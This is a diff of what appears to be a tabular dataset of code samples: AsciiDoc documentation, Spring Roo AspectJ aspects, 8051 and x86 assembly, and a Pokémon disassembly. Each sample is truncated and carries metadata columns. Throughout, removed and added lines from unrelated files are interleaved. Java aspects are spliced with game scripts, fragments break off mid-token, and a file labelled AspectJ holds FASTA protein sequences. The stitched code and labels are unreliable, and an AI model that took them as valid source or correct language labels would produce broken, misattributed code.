le -décrit de manière exhaustive, c'est donc un gros morceau mais il contient -beaucoup de concepts qui seront assimilés par le lecteur dès la première lecture. -C'est notamment le cas de ce chapitre. Par la suite, l'utilisateur reviendra ici, -d'abord pour chaque détail de création de son G-code, puis plus tard, seulement -pour vérifier la syntaxe des codes les moins courants. Il aura alors perçu la -puissance de ce langage et de LinuxCNC qui le met à profit","14","0.004039238315060588","0.0","0.0" -"008730a7cf95d08ea014296f585d0aa15b734734","adding-board-support.txt",".txt","AsciiDoc","// -*- mode:doc; -*- -// vim: set syntax=asciidoc: - -[[adding-board-support]] -== Adding support for a particular board - -Buildroot contains basic configurations for several publicly available -hardware boards, so that users of such a board can easily build a system -that is known to work. You are welcome to add support for other boards -to Buildroot too. - -To do so, you need to create a normal Buildroot configuration that -builds a basic system for the hardware: (internal) toolchain, kernel, -bootloader, filesystem and a simple BusyBox-only userspace. No specific -package should be selected: the configuration should be as minimal as -possible, and should only build a working basic BusyBox system for the -target platform. You can of course use more complicated configurations -for your internal projects, but the Buildroot project will only -integrate basic board configurations. This is because package -selections are highly application-specific. - -Once you have a known working configuration, run +make -s","14","0.004039238315060588","0.0","0.0" -"0313f80b16f7560c7052dd12ecd7044997bca5a2","Master_Getting_Started_es.txt",".txt","AsciiDoc","Primeros pasos V2.5, {localdate} -================================= - -:lang: es - -:masterdir: {indir} - -The LinuxCNC Team - -:leveloffset: 1 - -image::common/images/emc2-intro.*[] - -include::common/overleaf.txt[] - -include::common/System_Requirements_es.txt[] - -include::common/Getting_EMC_es.txt[] - -include::common/Updating_EMC.txt[] - -include::quickstart/stepper_quickstart_es.txt[] +The 'utlist' macros have bee","16","0.004740740740740741","0.0","0.0" +"159e6d2c1b5dff86ddfa3a665a7f3d05e6ca26d2","updateinfoxml2solv.txt",".txt","AsciiDoc","updateinfoxml2solv(1) +===================== +:man manual: LIBSOLV +:man source: libsolv -include::config/stepconf_es.txt[] -include::config/pncconf.txt[] +Name +---- +updateinfoxml2solv - convert rpm-md's updateinfo.xml format into a solv file -include::config/copy_and_run_es.txt[] +Synopsis +-------- +*updateinfoxml2solv* ['OPTIONS'] -include::common/Linux_FAQ_es.txt[] +Description +----------- +The updateinfoxml2solv tool reads rpm-md's updateinfo xml data from stdin, +and writes it as solv file to standard output. Update elements are converted +into special *patch:* pseudo packages. -include::common/GPLD_Copyright.txt[] +See Also +-------- +mergesolv(1), createrepo(8) -// = Index +Author +------ +Michael Schroeder +//// +vim: syntax=asciidoc +//// +","16","0.004740740740740741","0.0","0.0" +"156a24066e24320554eb5b6badf2b652fa165b41","configure.txt",".txt","AsciiDoc","// -*- mode:doc; -*- // vim: set syntax=asciidoc: - -","14","0.004039238315060588","0.0","0.0" -"0022cd1c020c1215b6e7cf81bf0fbb589e9562d7","User_Roo_Finder.aj",".aj","AspectJ","// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO. +[[configure]] +Details on Buildroot configuration +---------------------------------- + +All the configuration options in +make *config+ have a help text +providing details about the option. However, a number of topics +require additional details that cannot easily be covered in the help +text and are there covered in the following sections. + +Cross-compilation toolchain +~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +A compilation toolchain is the set of tools that allows you to compile +code for your system. It consists of a compiler (in our case, +gcc+), +binary utils like assembler and linker (in our case, +binutils+) and a +C standard library (for example +http://www.gnu.org/software/libc/libc.html[GNU Libc], +http://www.uclibc.org/[uClibc]). + +The system installed on your development station certainly already has +a compilation toolchain that you can use to compile an application +that runs on your system. If you're using a PC, your compilation +toolchain runs on a","16","0.004740740740740741","0.0","0.0" +"0c7ea15466e3b9f7b858ddb42341433287d89035","AlerteDocument_Roo_Jpa_ActiveRecord.aj",".aj","AspectJ","// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO. // You may push code into the target .java compilation unit if you wish to edit any member(s). -package com.sindice.linker.domain; +package fr.sdis83.remocra.domain.remocra; -import com.sindice.linker.domain.User; -import java.lang.String; +import fr.sdis83.remocra.domain.remocra.AlerteDocument; +import java.util.List; import javax.persistence.EntityManager; -import javax.persistence.TypedQuery; +import javax.persistence.PersistenceContext; +import org.springframework.transaction.annotation.Transactional; -privileged aspect User_Roo_Finder { +privileged aspect AlerteDocument_Roo_Jpa_ActiveRecord { - public static TypedQuery User.findUsersByActivationKeyAndEmailAddress(String activationKey, String emailAddress) { - if (activationKey == null || activationKey.length() == 0) throw new IllegalArgumentException(""The activationKey argument is required""); - if (emailAddress == null || emailAddress.length() == 0) throw new IllegalArgumentException(""The emailAddress argument is required""); - EntityManager em = User.entityManager(); - TypedQuery q = em.createQuery(""SELECT o FROM User AS o WHERE o.activationKey = :activationKey AND o.emailAddress = :emailAddress"", User.class","417","1.0321782178217822","0.0","0.0" -"06dff1df39567bd0d38686f6aeff76b5294bd2ea","Student_Roo_ToString.aj",".aj","AspectJ","// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO. -// You may push code into the target .java compilation unit if you wish to edit any member(s). - -package com.mycompany.roo.domain; - -import com.mycompany.roo.domain.Student; -import org.apache.commons.lang3.builder.ReflectionToStringBuilder; -import org.apache.commons.lang3.builder.ToStringStyle; - -privileged aspect Student_Roo_ToString { + @PersistenceContext + transient EntityManager AlerteDocument.entityManager; - public String Student.toString() { - return ReflectionToStringBuilder.toString(this, ToStringStyle.SHORT_PREFIX_STYLE); - } + public static final List AlerteDocument.fieldNames4OrderClauseFilter = java.util.Arrays.asList(""id"", ""alerte"", ""document""); -} -","417","1.0321782178217822","0.0","0.0" -"0bb1f93dd12ff83f9317aa4f2f496794c29ed391","WarehouseTypesController_Aspect.aj",".aj","AspectJ","// WARNING: DO NOT EDIT THIS FILE. -// You may push code into the target .java compilation unit if you wish to edit any member(s). -package org.openlegacy.mvc.frontend.controllers; - -import org.openlegacy.mvc.remoting.entities.WarehouseTypes; -import org.openlegacy.terminal.ScreenEntity; -import org.openlegacy.terminal.TerminalSession; -import org.openlegacy.terminal.actions.TerminalActions; -import org.openlegacy.terminal.services.ScreenEntitiesRegistry; -import org.springframework.beans.propertyeditors.CustomDateEditor; -import org.springframework.ui.Model; -import org.springframework.web.bind.WebDataBinder; -import org.springframework.web.bind.annotation.InitBinder; -import org.springframework.web.bind.annotation.RequestMapping; -import org.springframework.web.bind.annotation.RequestMethod; - -import java.text.SimpleDateFormat; -import java.util.Date; - -import javax.inject.Inject; -import javax.servlet.http.HttpServletRequest; - -privileged aspect WarehouseTypesController_Aspect { - - @Inject - private Te","417","1.0321782178217822","0.0","0.0" -"06778a99aa4140a5c45d7d214f39d38a4cf8e9b0","OwnerIntegrationTest_Roo_IntegrationTest.aj",".aj","AspectJ","// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO. + public static final EntityManager AlerteDocument.entityManager() { + EntityManager em = new AlerteDocument().entityManager; + if (em == null) throw new IllegalStateException(""Entity manager has not been injected (is the Spring Aspects JAR configured as an","421","1.0169082125603865","0.0","0.0" +"01b03ac21150ff075c5f503d9830fd89c997734a","ObjektiSeadusIntsidendi_Roo_Entity.aj",".aj","AspectJ","// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO. // You may push code into the target .java compilation unit if you wish to edit any member(s). -package com.example.petclinic.domain; +package ee.itcollege.group04_2011.entities; -import com.example.petclinic.domain.Owner; -import com.example.petclinic.domain.OwnerDataOnDemand; -import com.example.petclinic.domain.OwnerIntegrationTest; +import ee.itcollege.group04_2011.entities.ObjektiSeadusIntsidendi; +import java.lang.Integer; +import java.lang.Long; import java.util.List; -import org.junit.Assert; -import org.junit.Test; -import org.junit.runner.RunWith; -import org.springframework.beans.factory.annotation.Autowired; -import org.springframework.test.context.ContextConfiguration; -import org.springframework.test.context.junit4.SpringJUnit4ClassRunner; +import javax.persistence.Column; +import javax.persistence.EntityManager; +import javax.persistence.PersistenceContext; +import javax.persistence.Version; import org.springframework.transaction.annotation.Transactional; -privileged aspect OwnerIntegrationTest_Roo_IntegrationTest { +privileged aspect ObjektiSeadusIntsidendi_Roo_Entity { + + @PersistenceContext + transient EntityManager ObjektiSeadusIntsidendi.entityManager; + + @Version + @Column(name = ""version"") + private Integer ObjektiSeadusIntsidendi.version; - declare @type: OwnerIntegrationTest: @RunWith(SpringJUnit4ClassRunner.class); + public Integer ObjektiSeadusIntsidendi.getVersion() { + return this.version; + } - declare @type: OwnerIntegrationTest: @ContextConfiguration(locations = ""classpath:/META-INF/spring/applicationCont","417","1.0321782178217822","0.0","0.0" -"0d2ad1d6dcfa4a41d4a3a1169f24ca9281b6ca2a","Partie_Roo_Configurable.aj",".aj","AspectJ","// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO. + public void ObjektiSeadusIntsidendi.setVersion(Integer version) { + ","421","1.0169082125603865","0.0","0.0" +"0cd78d896fa45bf3c65b34b4ba6d9a039117c46f","uniprot_sprot.fasta.aj",".aj","AspectJ","EEIETSEIRPGRDLPVRKRRKICRSLGSHLASGGWNLSREQGNKLLASRFRGDCLYICNW +PGCIHVEEKRNYMLFRGVFKDFKRSRVWRTINDGNRSKTSGLKCAFCLCDETWDLHSSFC +LRRVFGFHDDGEPVVRAYVCENGHVSGAWTALPLYT +>sp|Q9Y6B2|EID1_HUMAN EP300-interacting inhibitor of differentiation 1 OS=Homo sapiens GN=EID1 PE=1 SV=1 +MSEMAELSELYEESSDLQMDVMPGEGDLPQMEVGSGSRELSLRPSRSGAQQLEEEGPMEE +EEAQPMAAPEGKRSLANGPNAGEQPGQVAGADFESEDEGEEFDDWEDDYDYPEEEQLSGA +GYRVSAALEEADKMFLRTREPALDGGFQMHYEKTPFDQLAFIEELFSLMVVNRLTEELGC +DEIIDRE +>sp|Q9DCR4|EID1_MOUSE EP300-interacting inhibitor of differentiation 1 OS=Mus musculus GN=Eid1 PE=1 SV=2 +MAEMAELCELYEESNELQMDVLPGEGYMEVGRGARGPAPEEGPMEEEAGPAAARAQRGLF +PEAGADLEGDEFDDWEDDYEFPEEERWSGAMHRVSAALEEANKVFLRTARAGDALDGGFQ +ARCEKSPFDQLAFIEELFSLMVVNRLTEELGCDEIIDRELMLTREEETT +>sp|Q5RDL6|EID1_PONAB EP300-interacting inhibitor of differentiation 1 OS=Pongo abelii GN=EID1 PE=2 SV=1 +MSEMAELSELYEESSDLQMDVMPGEGDLPQMEVGSGSRELSLRPSRNGAQPQLEEEGPME +EEEAQPMAAPEGKRSLASGPNAGEQPGQVAGADFESEDEGEEFDDWEDDYDYPEEEQLSG +AGYRVSAALEEADKMFLRTREPALDGGFQMHYEKTPFDQLA","421","1.0169082125603865","0.0","0.0" +"0615681a16b08bb1ce94b7308fd9aa6d90542a91","RutaSeguida_Roo_JavaBean.aj",".aj","AspectJ","// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO. // You may push code into the target .java compilation unit if you wish to edit any member(s). -package fr.bermone.domain; +package es.jcornez.ruta.entidad; -import fr.bermone.domain.Partie; -import org.springframework.beans.factory.annotation.Configurable; +import es.jcornez.ruta.entidad.Ruta; +import es.jcornez.ruta.entidad.RutaSeguida; +import es.jcornez.ruta.entidad.Usuario; +import java.util.Date; -privileged aspect Partie_Roo_Configurable { +privileged aspect RutaSeguida_Roo_JavaBean { - declare @type: Partie: @Configurable; + /** + * TODO Auto-generated method documentation + * + * @return Long + */ + public Long RutaSeguida.getId() { + return this.id; + } -} -","417","1.0321782178217822","0.0","0.0" -"1ec626ece87bc07ce3c92071bab5b69292439ca8","usb_descriptors.a51",".a51","Assembly",";;; -*- asm -*- + /** + * TODO Auto-generated method documentation + * + * @param id + */ + public void RutaSeguida.setId(Long id) { + this.id = id; + } + + /** + * TODO Auto-generated method documentation + * + * @return Integer + */ + public Integer RutaSeguida.getVersion() { + return this.version; + } + + /** + * TODO Auto-generated method documentation + * + * @param version + ","421","1.0169082125603865","0.0","0.0" +"0aa8dbc96edbf82ebd6a89038d5bee3a23ebc9ea","ParteService_Roo_Service.aj",".aj","AspectJ","// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO. +// You may push code into the target .java compilation unit if you wish to edit any member(s). -;;; GECKO3COM -;;; -;;; Copyright (C) 2008 by -;;; ___ ____ _ _ -;;; ( _`\ ( __)( ) ( ) -;;; | (_) )| (_ | |_| | Berne University of Applied Sciences -;;; | _ <'| _) | _ | School of Engineering and -;;; | (_) )| | | | | | Information Technology -;;; (____/'(_) (_) (_) -;;; -;;; -;;; This program is free software: you can redistribute it and/or modify -;;; it under the terms of the GNU General Public License as published by -;;; the Free Software Foundation, either version 3 of the License, or -;;; (at your option) any later version. -;;; -;;; This program is distributed in the hope that it will be useful, -;;; but WITHOUT ANY WARRANTY; without even the implied warranty of -;;; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -;;; GNU General Public License for more details. -;;; You should have received a copy of the GNU General Public License -;;; along with this program. If not, see . -;;; -;;;*******************","12","0.0026098303610265334","0.0","0.0" -"20e9e7a41ef6afe610951146fa24e6dee4f176bd","sensor.a51",".a51","Assembly",":020000040000FA -:030000000200E318 -:030013000211D007 -:03003300021102B5 -:03003B0002122C82 -:03006300020F9DEC -:03006B00020FE29F -:03007B00021072FE -:1000830002119200000080FB120113B90003020069 -:10009300CDE4900F00784679038002F0A3D8FCD911 -:1000A300FA901145AA82AB8390011678807901807A -:1000B30015E493A3AC82AD838A828B83F0A3AA82D7 -:1000C300AB838C828D83D8E9D9E77582A7758327A3 -:1000D30074001200F575828675830074001200F5B2 -:1000E30075D0007581BF75100075110F759F0002E3 -:1000F300008BC09FF59FE473D09F22D083D082C032 -:100103009FE493C0E0740193C0E0740293F59F22CF -:10011300790122FF00000000000000000000004AF7 -:1001230001000000960000C6F8CCE5B4ABB8D0C619 -:10013300F7B5E7D1B9A3BA25642E25303264560D3D -:100143000A0000002041000000000A0000003031D6 -:100153003233343536373839414243444546002833 -:100163006E756C6C20706F696E74657229003F3F09 -:100173003F000000807F0000803FF9021550B74325 -:10018300BA5100E7DB2E0000A04010000000080079 -:1001930000001200FEC424001200FEE3250012003A -:1001A300FE7026001200FE2629001200FE372900E9 -:1001B3001200FE5329001","12","0.0026098303610265334","0.0","0.0" -"062388fbfd6d6ba34428ac3715880a3049e7ce4b","TP3_gene.a51",".a51","Assembly"," ;Gene - ;Generer signal rectangulaire - ;19/11/18 - - ;Déclaration des variables - -GENE bit P3.0 - -;Table des IT - org 0000h ;directive assembleur - SJMP debut - org 000Bh - SJMP itimer0 - org 0030h - -;Programme principal -debut: - LCALL init - SETB TF0 ;On active la première interruption - - -boucle: - - - SJMP boucle -fin: - -; -;---------------------------------------------------------------------------- -;interuption timer 0 -itimer0: - PUSH ACC - -siHaut: JNB GENE,sinon - MOV R0,#0E7h - MOV R1,#0FCh - -finsi: SJMP fsinon -sinon: MOV R0,#3Fh - MOV R1,#0FFh - -fsinon: - - - CLR TR0 ;on arrete le timer 1 - MOV A,TL0 ; 1 - ADD A,R0 ; 1 - MOV TL0,A ; 1 - MOV A,TH0 ; 1 - ADDC A,R1 ; 1 - MOV TH0,A ; 1 - - SETB TR0 ;démarage du timer - CPL GENE ;on passe d'un état à l'","12","0.0026098303610265334","0.0","0.0" -"138ce9ef03d5e6868a19ba76af117b5a595fab90","L51_BANK.A51",".a51","Assembly","$NOMOD51 NOLINES -$NOCOND -;------------------------------------------------------------------------------ -; This file is part of the BL51 / LX51 Banked Linker/Locater package -; Copyright (c) 1988 - 2001 Keil Elektronik GmbH and Keil Software, Inc. -; Version 2.20 (Code and Variable Banking for Classic 8051 Derivatives) -;------------------------------------------------------------------------------ -;************************ Configuration Section ******************************* -?B_NBANKS EQU 4 ; Define maximum Number of Banks * -; ; following values are allowed: 2, 4, 8, 16, 32, 64 * -; ; for BL51 the maximum value for ?B_BANKS is 32 * -; ; for LX51 the maximum value for ?B_BANKS is 64 * -; * -?B_MODE EQU 0 ; 0 for Bank-Switching via 8051 Port * -; ; 1 for Bank","12","0.0026098303610265334","0.0","0.0" -"1754accb6eb6d45a0806a0d1f8b59fccc6f303f8","main.a51",".a51","Assembly","; Example program 05: UART-RS232 -; Chin-Shiuh Shieh -; 2003-03-09 -; -; Memory Allocation -UART_BUSY EQU 00h -; Pin Assignment -LED_PORT EQU P2 -DIV_SWITCH EQU P1 -SAVE_DATA EQU 30h -SAVE_D2 EQU 29h -; -PROG EQU 0000h - ORG PROG+0000h - SJMP START -;Interrupt Vector Table - ORG PROG+0003h - LCALL INT0_ISR - RETI - ORG PROG+000Bh - LCALL T0_ISR - RETI - ORG PROG+0013h - LCALL INT1_ISR - RETI - ORG PROG+001Bh - LCALL T1_ISR - RETI - ORG PROG+0023h - LCALL UART_ISR - RETI -; - ORG PROG+0030h -START: - CLR UART_BUSY - MOV TMOD,#00100001b ; Timer1 in Mode 2, Timer0 in Mode 1 - MOV TH1, #0FDh ; Baud Rate = 9600 bps at 11.0592MHz - MOV SCON,#01010000b ; UART in Mode 1 - MOV DIV_SWITCH, #0FFh - SETB ES ; Enable UART Interrupt - SETB EA ; Enable Interrupt - SETB TR1 ; Start Timer 1 - MOV A,#'H' - CALL UART_PUTC - MOV A,#'e' - CALL UART_PUTC - MOV A,#'l' - CALL UART_PUTC - MOV A,#'l' - CALL UART_PUTC - MOV A,#'o' - CALL UART_PU","12","0.0026098303610265334","0.0","0.0" -"0ee49ffe6776fc6e50032bed52fcd924ecf86a2c","Krusader 1.3 65C02.asm",".asm","Assembly","; KRUSADER - An Editor/Assembler/Disassembler for the Replica 1 - -; 65C02 version 1.3 - 24 December, 2007 -; (c) Ken Wessen (ken.wessen@gmail.com) - -; Notes: -; - entry points: -; SHELL = $711C($F01C) -; MOVEDN = $7304($F204) -; DEBUG = -($FE03) -; SHOW = -($FE16) -; DSMBL = $7BEA($FAEA) -; **************************************** -; - Does not support the single bit operations BBR, BBS, SMB, RMB, or STP and WAI -; - minimonitor does not include tracing -; - 49 bytes free - -APPLE1 =1 -INROM =1 -TABTOSPACE = 1 -UNK_ERR_CHECK = 0 - -MINIMONITOR = INROM & 1 -BRKAS2 = 1 ; if 1, BRK will assemble to two $00 bytes - ; if set, then minimonitor will work unchanged - ; for both hardware and software interrupts - - .if INROM - .org $F000 - .else - .org $7100 - .endif - .start MAIN - - .if INROM -MONTOR =ESCAPE - .ELSE -MONTOR =$FF1F - .endif - -; Constants - -BS =$08 ; backspace -SP =$20 ; space -CR =$0D ; carriage return -LF =$0A ; line feed -ESC =$1B ; escape -INMASK ","3510","0.763375380600261","0.0","0.0" -"1e5fd1d8a30b74a9cdd6011e5a4d2b28dc0e3735","0x10001142.asm",".asm","Assembly","section .data - value1: dq 0h -section .text -global main -main: - call setupstack - mov esp, 012ff8ch - int3 ; store states for vertical comparison - - - ;; populate user registers - mov ah, 46h - sahf - mov eax, 0000001bh - mov ebx, 00001000h - mov ecx, 00000010h - mov edx, 0000001ah - mov esi, 00403000h - mov edi, 00403020h - - ;; populate memory with pre-defined values - ;; double-precision - MOV EAX, 00403080H ;; + INFI - MOV DWORD [EAX], 0H - MOV DWORD [EAX+4], 7FF00000H - MOV EAX, 00403090H ;; largest +normal - MOV DWORD [EAX], 0FFFFFFFFH - MOV DWORD [EAX+4], 7FEFFFFFH - MOV EAX, 004030A0H ;; close to largest +normal - MOV DWORD [EAX], 0FFFFFFFEH - MOV DWORD [EAX+4], 7FEFFFFFH - MOV EAX, 004030B0H ;; close to smallest +normal - MOV DWORD [EAX], 2H - MOV DWORD [EAX+4], 00100000H - MOV EAX, 004030C0H ;; smallest +normal - MOV DWORD [EAX], 0H - MOV DWORD [EAX+4], 00100000H - MOV EAX, 004030D0H ;; largest +denormal - MOV DWORD [EAX], 0FFFFFFFCH - MOV DWORD [EAX+4], 000FFFFFH -","3510","0.763375380600261","0.0","0.0" -"2105891ce07fd0869462849819c090a1346e2c80","ViridianPokecenter1F.asm",".asm","Assembly"," const_def 2 ; object constants - const VIRIDIANPOKECENTER1F_NURSE - const VIRIDIANPOKECENTER1F_COOLTRAINER_M - const VIRIDIANPOKECENTER1F_COOLTRAINER_F - const VIRIDIANPOKECENTER1F_BUG_CATCHER - -ViridianPokecenter1F_MapScripts: - db 0 ; scene scripts - - db 0 ; callbacks - -ViridianPokecenter1FNurseScript: - jumpstd pokecenternurse - -ViridianPokecenter1FCooltrainerMScript: - faceplayer - opentext - checkevent EVENT_BLUE_IN_CINNABAR - iftrue .BlueReturned - writetext ViridianPokecenter1FCooltrainerMText - waitbutton - closetext - end +package br.com.appscpj.service; -.BlueReturned: - writetext ViridianPokecenter1FCooltrainerMText_BlueReturned - waitbutton - closetext - end +import br.com.appscpj.domain.Parte; +import br.com.appscpj.service.ParteService; +import java.util.List; -ViridianPokecenter1FCooltrainerFScript: - faceplayer - opentext - writetext ViridianPokecenter1FCooltrainerFText - waitbutton - closetext - turnobject VIRIDIANPOKECENTER1F_COOLTRAINER_F, UP - end +privileged aspect ParteService_Roo_Service { + + public abstract long ParteService.countAllPartes(); + public abstract void ParteService.deleteParte(Parte parte); + public abstract Parte ParteService.findParte(Long id); + public abstract List ParteService.findAllPartes(); + public abstract List ParteService.findParteEntries(int firstResult, int maxResults); + public abstract void ParteService.saveParte(Parte parte); + public abstract Parte ParteService.updateParte(Parte parte); +} +","421","1.0169082125603865","0.0","0.0" +"18d32678a7e3cbce39e2d03dca7f418ed4e9453a","asm_test1_yy.a51",".a51","Assembly","file->prog_block +prog_block->prog_block macro_text_line +- +prog_block->prog_block EOL +- +prog_block->prog_block EOL +- +prog_block->prog_block EOL +- +prog_block->prog_block EOL +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block label_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_block cmd_text_line +- +prog_block->prog_b","13","0.002790298347284825","0.0","0.0" +"11b3e8bb2230bc5909b44b2bdd00b469faa1f39b","(B3)CPL_C.a51",".a51","Assembly","START: + CPL C + SJMP START","13","0.002790298347284825","0.0","0.0" +"18748ba6ae15094046e3c8e3138a7d1505ea109f","klawiatura_i_ekran.a51",".a51","Assembly","LJMP START +P5 EQU 0F8H +P7 EQU 0DBH + + ; LCD registers ---------------------------------- + LCDstatus equ 0FF2EH + LCDcontrol equ 0FF2CH + LCDdataWR equ 0FF2DH + LCDdataRD equ 0FF2FH + P6 EQU 0FAH + + // LCD control bytes --------------------------------- + + #define HOME 0x80 // put curcor to second line + #define INITDISP 0x38 // LCD init (8-bit mode) + #define HOM2 0xc0 // put curcor to second line + #define LCDON 0x0e // LCD nn, cursor off, blinking of + #define CLEAR 0x01 // LCD display clear -ViridianPokecenter1FBugCatcherScript: - jumptextfaceplayer ViridianPokecenter1FBugCatcherText - - -ViridianPokecenter1FCooltrainerMText: - text ""Where in the world"" - line ""is VIRIDIAN's GYM","3510","0.763375380600261","0.0","0.0" -"00bc2b5f61e576b23f950e1c57c546f01e69ba33","Ejercicio 7.asm",".asm","Assembly"," ORG 1000H - FRASE DB 'AzAytA',0 - CARAC DB 'A' - - ORG 3000H - NCHAR: PUSH BX - MOV BX,SP - ADD BX,4 - MOV AX,[BX] - ADD BX,2 - MOV DX,[BX] - MOV BX,DX - SIGO: CMP BYTE PTR [BX],0 - JZ FIN - CMP AL,[BX] - JNZ NO_SUMO - INC CX - MOV byte ptr[BX],58H - NO_SUMO: INC BX - JMP SIGO - FIN: POP BX - RET -; -; - ORG 2000H - MOV CX,0000H - MOV BX,OFFSET FRASE - PUSH BX - MOV AH,0 - MOV AL,CARAC - PUSH AX - CALL NCHAR - HLT - END -","3510","0.763375380600261","0.0","0.0" -"1c0703f774f7503a7b0d3badda594a949088d655","route4.asm",".asm","Assembly","Route4_h: ; 0x54390 to 0x543b2 (34 bytes) (id=15) - db OVERWORLD ; tileset - db ROUTE_4_HEIGHT, ROUTE_4_WIDTH ; dimensions (y, x) - dw Route4Blocks, Route4TextPointers, Route4Script; blocks, texts, scripts - db SOUTH | EAST ; connections - SOUTH_MAP_CONNECTION ROUTE_3, ROUTE_3_WIDTH, -3, 22, ROUTE_3_WIDTH - 22, Route3Blocks, ROUTE_4_WIDTH, ROUTE_4_HEIGHT - EAST_MAP_CONNECTION CERULEAN_CITY, CERULEAN_CITY_WIDTH, -3, 1, CERULEAN_CITY_HEIGHT - 3, CeruleanCityBlocks, ROUTE_4_WIDTH - dw Route4Object ; objects -","3510","0.763375380600261","0.0","0.0" -"0daf8f71cb54c4333aa5c221db1988e433e07eab","ReadGs.i",".i","Assembly","#line 1 ""c:\\edk2\\MdePkg\\Library\\BaseLib\\X64\\ReadGs.nasm"" -#line 1 ""c:\\edk2\\Build\\NT32X64\\DEBUG_VS2017\\X64\\MdePkg\\Library\\BaseLib\\BaseLib\\DEBUG\\AutoGen.h"" - - - - - - - - - - - - - - - -#line 1 ""c:\\edk2\\MdePkg\\Include\\Base.h"" - - - - - - - - - - - - - - - - - - - - - - - - - - - -#line 1 ""c:\\edk2\\MdePkg\\Include\\X64\\ProcessorBind.h"" - - - - - - - - - - - - - - - - - - - - - - - - - - -#pragma pack() -#line 29 ""c:\\edk2\\MdePkg\\Include\\X64\\ProcessorBind.h"" - - - - - - - - - - - - - -#line 43 ""c:\\edk2\\MdePkg\\Include\\X64\\ProcessorBind.h"" - - - - - - - - - - - - - - - - - - - - - - - - - - -#line 70 ""c:\\edk2\\MdePkg\\Include\\X64\\ProcessorBind.h"" - - - - - - - - - - - - -#pragma warning ( disable : 4214 ) - - - - -#pragma warning ( disable : 4100 ) - - - - - -#pragma warning ( disable : 4057 ) - - - - -#pragma warning ( disable : 4127 ) - - - - -#pragma warning ( disable : 4505 ) - - - - -#pragma warning ( disable : 4206 ) - - - - - - - - - - - -#pragma wa","375","0.08155719878207916","0.0","0.0" -"170b8c1c900f85e255009e2ccb1c59329f7de1e5","sub_5th_typical_temp_14.i",".i","Assembly","#all liquid region, use MultiApp to transfer information with subsub_5th.i -#[GlobalParams] -# use_displaced_mesh = true -#[] +ORG 0100H + +LCDcntrlWR MACRO x + LOCAL loop + loop: + MOV DPTR,#LCDstatus + MOVX A,@DPTR + JB ACC.7,loop ; check if LCD busy + + MOV DPTR,#LCDcontrol ; write to LCD control + MOV A, x + MOVX @DPTR,A + ENDM + +LCDcharWR MACRO + LOCAL loop1,","13","0.002790298347284825","0.0","0.0" +"065309eb9903e07a9d1fce34dcfcd0e0e63d471d","dscr.a51",".a51","Assembly",";;----------------------------------------------------------------------------- +;; File: dscr.a51 +;; Contents: This file contains descriptor data tables. +;; +;; $Archive: /USB/Examples/Fx2lp/bulkloop/dscr.a51 $ +;; $Date: 9/01/03 8:51p $ +;; $Revision: 3 $ +;; +;; +;;----------------------------------------------------------------------------- +;; Copyright 2003, Cypress Semiconductor Corporation +;;-----------------------------------------------------------------------------;;----------------------------------------------------------------------------- + +DSCR_DEVICE equ 1 ;; Descriptor type: Device +DSCR_CONFIG equ 2 ;; Descriptor type: Configuration +DSCR_STRING equ 3 ;; Descriptor type: String +DSCR_INTRFC equ 4 ;; Descriptor type: Interface +DSCR_ENDPNT equ 5 ;; Descriptor type: Endpoint +DSCR_DEVQUAL equ 6 ;; Descriptor type: Device Qualifier + +DSCR_DEVICE_LEN equ 18 +DSCR_CONFIG_LEN equ 9 +DSCR_INTRFC_LEN equ 9 +D","13","0.002790298347284825","0.0","0.0" +"0fb426ef2271e4810d0b806cdad43611731d17c5","enhanced_selector_fselinit.A51",".a51","Assembly","#include + +EXTRN ECODE(sfselInit??) + +MIDAPI SEGMENT ECODE + +rseg MIDAPI + +/////////////////////////////////////////////// +public fselInit?? +fselInit??: +MOV WR8,#WORD0(sfselInit??) +MOV R10, #BYTE2(sfselInit??) +LJMP RSTMIDAPI + +END","13","0.002790298347284825","0.0","0.0" +"0fccf5f1c09ab1100e1e6a72baeea63ee5abe905","jump_x86_64_ms_pe_masm.asm",".asm","Assembly"," +; Copyright Oliver Kowalke 2009. +; Distributed under the Boost Software License, Version 1.0. +; (See accompanying file LICENSE_1_0.txt or copy at +; http://www.boost.org/LICENSE_1_0.txt) + +; ---------------------------------------------------------------------------------- +; | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | +; ---------------------------------------------------------------------------------- +; | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | +; ---------------------------------------------------------------------------------- +; | R12 | R13 | R14 | R15 | +; ---------------------------------------------------------------------------------- +; ---------------------------------------------------------------------------------- +; | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | +; ----------","3449","0.7402876153681047","0.0","0.0" +"15d5133d25bc8644926624dd29798ec37d447ed5","play.asm",".asm","Assembly","; Stand-alone executable for playing an Oidos song. + +%include ""oidos.inc"" + +global _main + +extern __imp__fopen +extern __imp__fwrite +extern __imp__fclose +extern __imp__printf +extern __imp__GetAsyncKeyState@4 +extern __imp__ExitProcess@4 +extern __imp__Sleep@4 + + section main text align=1 + +_main: + push message + push messageformat + call [__imp__printf] + add esp, byte 2*4 + + call _Oidos_FillRandomData + call _Oidos_GenerateMusic + +%ifdef WRITE_WAV 